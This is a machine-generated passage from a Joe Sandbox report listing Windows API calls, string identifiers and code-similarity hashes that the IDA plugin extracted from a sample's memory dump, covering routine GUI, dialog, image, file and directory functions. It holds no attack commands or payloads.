                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: f122deb9cff61635a508ebe82b5d60b6f233f809160ea59893c7ad4c76060210
                            • Instruction ID: 3e95316cb4fafd8fb50b68e2f96d9f34da5653ffd2a2e3037ef31695801b2b0a
                            • Opcode Fuzzy Hash: f122deb9cff61635a508ebe82b5d60b6f233f809160ea59893c7ad4c76060210
                            • Instruction Fuzzy Hash: 2431BF31A44645AADB24FB60DD13EEE73B56F25B58F200125F581B10D7FF61AF04C661
                            APIs
                            • LoadIconW.USER32(00000063), ref: 000BF8AB
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000BF8BD
                            • SetWindowTextW.USER32(?,?), ref: 000BF8D4
                            • GetDlgItem.USER32(?,000003EA), ref: 000BF8E9
                            • SetWindowTextW.USER32(00000000,?), ref: 000BF8EF
                            • GetDlgItem.USER32(?,000003E9), ref: 000BF8FF
                            • SetWindowTextW.USER32(00000000,?), ref: 000BF905
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000BF926
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000BF940
                            • GetWindowRect.USER32(?,?), ref: 000BF949
                            • SetWindowTextW.USER32(?,?), ref: 000BF9B4
                            • GetDesktopWindow.USER32 ref: 000BF9BA
                            • GetWindowRect.USER32(00000000), ref: 000BF9C1
                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000BFA0D
                            • GetClientRect.USER32(?,?), ref: 000BFA1A
                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000BFA3F
                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000BFA6A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 169a04763fe4ad1c1865fb80a81a89ab92a821ba751d7b320f9789319bc0cda6
                            • Instruction ID: 4687ff9d8cbf7c2a62c32db7936ebe0baa943579ca532e47ecc2005173b28961
                            • Opcode Fuzzy Hash: 169a04763fe4ad1c1865fb80a81a89ab92a821ba751d7b320f9789319bc0cda6
                            • Instruction Fuzzy Hash: 42514E7090070AAFDB209FA8DD89FAEBBF5FF04704F004528E596A39A1D7B5A944CB10
                            APIs
                            • _memset.LIBCMT ref: 000ECD0B
                            • DestroyWindow.USER32(?,?), ref: 000ECD83
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000ECE04
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000ECE26
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ECE35
                            • DestroyWindow.USER32(?), ref: 000ECE52
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00080000,00000000), ref: 000ECE85
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ECEA4
                            • GetDesktopWindow.USER32 ref: 000ECEB9
                            • GetWindowRect.USER32(00000000), ref: 000ECEC0
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000ECED2
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000ECEEA
                              • Part of subcall function 0009B155: GetWindowLongW.USER32(?,000000EB), ref: 0009B166
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$tooltips_class32
                            • API String ID: 1297703922-3619404913
                            • Opcode ID: 74ad5feafb32068e77aa77f085cd288568eeeff8efc36320f8edcf7f0d2585ec
                            • Instruction ID: 7dd5f8135114a2b273c949caacba0ae26f5ec8ea9ddd5c56cc38b68a1da99c00
                            • Opcode Fuzzy Hash: 74ad5feafb32068e77aa77f085cd288568eeeff8efc36320f8edcf7f0d2585ec
                            • Instruction Fuzzy Hash: 3871AA75240389AFE724CF28DC45FAA3BE5FB89704F44051CF985A76A1D772E842CB11
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DragQueryPoint.SHELL32(?,?), ref: 000EF14B
                              • Part of subcall function 000ED5EE: ClientToScreen.USER32(?,?), ref: 000ED617
                              • Part of subcall function 000ED5EE: GetWindowRect.USER32(?,?), ref: 000ED68D
                              • Part of subcall function 000ED5EE: PtInRect.USER32(?,?,000EEB2C), ref: 000ED69D
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF1B4
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000EF1BF
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000EF1E2
                            • _wcscat.LIBCMT ref: 000EF212
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000EF229
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF242
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF259
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF27B
                            • DragFinish.SHELL32(?), ref: 000EF282
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000EF36D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                            • API String ID: 169749273-3440237614
                            • Opcode ID: 00a12132c12cab7cdcfcbc804ebc3fb30a54fc0c4bcb7666ff32ad87a3022b68
                            • Instruction ID: dcd904a95d63f750493f23434553616ef09ff48e5a5538895872fd2d51ee7cad
                            • Opcode Fuzzy Hash: 00a12132c12cab7cdcfcbc804ebc3fb30a54fc0c4bcb7666ff32ad87a3022b68
                            • Instruction Fuzzy Hash: CF614A71108301AFC710EF64DC85DABBBF8FF89710F000A2DF595921A2DB709A45CB62
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 000CB46D
                            • VariantCopy.OLEAUT32(?,?), ref: 000CB476
                            • VariantClear.OLEAUT32(?), ref: 000CB482
                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000CB561
                            • __swprintf.LIBCMT ref: 000CB591
                            • VarR8FromDec.OLEAUT32(?,?), ref: 000CB5BD
                            • VariantInit.OLEAUT32(?), ref: 000CB63F
                            • SysFreeString.OLEAUT32(00000016), ref: 000CB6D1
                            • VariantClear.OLEAUT32(?), ref: 000CB727
                            • VariantClear.OLEAUT32(?), ref: 000CB736
                            • VariantInit.OLEAUT32(00000000), ref: 000CB772
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                            • API String ID: 3730832054-3931177956
                            • Opcode ID: 5fe2236157de5afeaf5ed01fc5bb83395317afc2d1007fe53b2d49c1b540adf7
                            • Instruction ID: 96af5e68afce0d9b3dd009545c03f6c167b93a4dbfc34dedc0de0af89ae9fb07
                            • Opcode Fuzzy Hash: 5fe2236157de5afeaf5ed01fc5bb83395317afc2d1007fe53b2d49c1b540adf7
                            • Instruction Fuzzy Hash: B5C1F331A08615EBCB24DFA5D486FAEB7F9FF05300F188469E4459B592CB74EC80DBA1
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 000E6FF9
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000E7044
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: 771b145f22af9b0437763f7f4dcdb8da3afafefc8515f3a6d3e589a8cfe0d9f7
                            • Instruction ID: 0b3866cd9b11e8091a9aba65598be46488f359aa694dce2c9b295953a3646839
                            • Opcode Fuzzy Hash: 771b145f22af9b0437763f7f4dcdb8da3afafefc8515f3a6d3e589a8cfe0d9f7
                            • Instruction Fuzzy Hash: B69161342087029FCB18EF15C851AAEB7A2AF94350F44886DF8966B393DB31ED46DB41
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000EE3BB
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000EBCBF), ref: 000EE417
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE457
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE49C
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE4D3
                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,000EBCBF), ref: 000EE4DF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EE4EF
                            • DestroyIcon.USER32(?,?,?,?,?,000EBCBF), ref: 000EE4FE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000EE51B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000EE527
                              • Part of subcall function 000A1BC7: __wcsicmp_l.LIBCMT ref: 000A1C50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            • Opcode ID: b771a43c5d991d94ee4c9cf6c6827d33fa3db0514f635b74d6629d44f1e07f37
                            • Instruction ID: 5c819a0ddc60bce6ad93d184520e3998ed99674455535b545529cf57ded502bc
                            • Opcode Fuzzy Hash: b771a43c5d991d94ee4c9cf6c6827d33fa3db0514f635b74d6629d44f1e07f37
                            • Instruction Fuzzy Hash: 7161CEB1540698BFEB24DFA5DC46FEE77B8BB08710F104215F955E60D1EBB4AA80C7A0
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 000D0EFF
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000D0F0F
                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D0F1B
                            • __wsplitpath.LIBCMT ref: 000D0F79
                            • _wcscat.LIBCMT ref: 000D0F91
                            • _wcscat.LIBCMT ref: 000D0FA3
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 000D0FB8
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0FCC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0FFE
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D101F
                            • _wcscpy.LIBCMT ref: 000D102B
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000D106A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                            • String ID: *.*
                            • API String ID: 3566783562-438819550
                            • Opcode ID: 1623aa06665235dcca1b2b99e8b87473aa00c98942d24f41ff1edaf6516813af
                            • Instruction ID: 4b0f246c439b4f5009bcae42d457eac2486afce7d41b7845feac605dc0394397
                            • Opcode Fuzzy Hash: 1623aa06665235dcca1b2b99e8b87473aa00c98942d24f41ff1edaf6516813af
                            • Instruction Fuzzy Hash: 78614D76504305AFD710EF60C844ADEB7E8FF89310F04891EF99997252EB31E945CBA2
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • CharLowerBuffW.USER32(?,?), ref: 000CDB26
                            • GetDriveTypeW.KERNEL32 ref: 000CDB73
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDBBB
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDBF2
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CDC20
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 2698844021-4113822522
                            • Opcode ID: 53899e07fec469c7276d8bcacda702e6cbdeac6f9bbb34d8a9d7898d82a6ac68
                            • Instruction ID: 678ee9fb93a30f2447586beaedfd1a80303cc5ec440fbaea55310a2955cdabc9
                            • Opcode Fuzzy Hash: 53899e07fec469c7276d8bcacda702e6cbdeac6f9bbb34d8a9d7898d82a6ac68
                            • Instruction Fuzzy Hash: 4C514771104705AFC700EF10C9819AAB7F8FF88758F50886DF899A7262DB71EE05CB52
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000F4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 000C3145
                            • LoadStringW.USER32(00000000,?,000F4085,00000016), ref: 000C314E
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,000F4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 000C3170
                            • LoadStringW.USER32(00000000,?,000F4085,00000016), ref: 000C3173
                            • __swprintf.LIBCMT ref: 000C31B3
                            • __swprintf.LIBCMT ref: 000C31C5
                            • _wprintf.LIBCMT ref: 000C326C
                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C3283
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                            • API String ID: 984253442-2268648507
                            • Opcode ID: 1ce60e938c43b9853de43eef1adce19f348707332d75b02508ddd0cebfd42579
                            • Instruction ID: 5fbda718c9cd3a5a34fdd7bf9ea588698be3512477b93483d53dcbe3a261a216
                            • Opcode Fuzzy Hash: 1ce60e938c43b9853de43eef1adce19f348707332d75b02508ddd0cebfd42579
                            • Instruction Fuzzy Hash: 04413D72900209AADB14FBE0DD86EEEB779AF14701F504065F645B20A3DBB5AF44CB61
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 000CD96C
                            • __swprintf.LIBCMT ref: 000CD98E
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 000CD9CB
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000CD9F0
                            • _memset.LIBCMT ref: 000CDA0F
                            • _wcsncpy.LIBCMT ref: 000CDA4B
                            • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 000CDA80
                            • CloseHandle.KERNEL32(00000000), ref: 000CDA8B
                            • RemoveDirectoryW.KERNEL32(?), ref: 000CDA94
                            • CloseHandle.KERNEL32(00000000), ref: 000CDA9E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: 4af693505c07e9b9f3d47ed2ff60b5fcb251c3df4691357ad590caae6544a49d
                            • Instruction ID: 0e00b9920edfa8046d0a9f08893da2ec094482897d2433caba2f066b84989c42
                            • Opcode Fuzzy Hash: 4af693505c07e9b9f3d47ed2ff60b5fcb251c3df4691357ad590caae6544a49d
                            • Instruction Fuzzy Hash: 5B319476600208AADB20DFA4DC49FDE77FDEF85710F1081AAF559D2061EB70DA818BA1
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000EBD04,?,?), ref: 000EE564
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE57B
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE586
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE593
                            • GlobalLock.KERNEL32(00000000), ref: 000EE59C
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5AB
                            • GlobalUnlock.KERNEL32(00000000), ref: 000EE5B4
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5BB
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000EBD04,?,?,00000000,?), ref: 000EE5CC
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0010D9BC,?), ref: 000EE5E5
                            • GlobalFree.KERNEL32(00000000), ref: 000EE5F5
                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000EE619
                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000EE644
                            • DeleteObject.GDI32(00000000), ref: 000EE66C
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000EE682
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3840717409-0
                            • Opcode ID: 8203ae67d64099963d69b9c1261eaa488c27d4b36ff6926c1a3bc538a2ec52e2
                            • Instruction ID: e44eee16e2a4cae73880f9722bdbf2cdc24aa5c5eb53f7aec6e9df38c00ebcf3
                            • Opcode Fuzzy Hash: 8203ae67d64099963d69b9c1261eaa488c27d4b36ff6926c1a3bc538a2ec52e2
                            • Instruction Fuzzy Hash: 1D417C75600248FFDB119FA5EC88EAE7BB8EF89715F108058F945E7260DB719D40CB60
                            APIs
                            • __wsplitpath.LIBCMT ref: 000D0C93
                            • _wcscat.LIBCMT ref: 000D0CAB
                            • _wcscat.LIBCMT ref: 000D0CBD
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 000D0CD2
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0CE6
                            • GetFileAttributesW.KERNEL32(?), ref: 000D0CFE
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 000D0D18
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000D0D2A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: 2dfdcda6f8bb80de7b7326e4658f2ce800ba4e1ed6ebb4214a556d2b9ae1e90f
                            • Instruction ID: 291e5ebdcf677b58e276f8b4f5dbf3a7cd2d42bd96535535209ec46be51d76a8
                            • Opcode Fuzzy Hash: 2dfdcda6f8bb80de7b7326e4658f2ce800ba4e1ed6ebb4214a556d2b9ae1e90f
                            • Instruction Fuzzy Hash: FA8181715143059FCB64DF64C844AAEB7E9BB88310F14892FF889C7351E734E984CBA2
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000EED0C
                            • GetFocus.USER32 ref: 000EED1C
                            • GetDlgCtrlID.USER32(00000000), ref: 000EED27
                            • _memset.LIBCMT ref: 000EEE52
                            • GetMenuItemInfoW.USER32 ref: 000EEE7D
                            • GetMenuItemCount.USER32(00000000), ref: 000EEE9D
                            • GetMenuItemID.USER32(?,00000000), ref: 000EEEB0
                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 000EEEE4
                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 000EEF2C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000EEF64
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000EEF99
                            Strings
                            Memory Dump Source
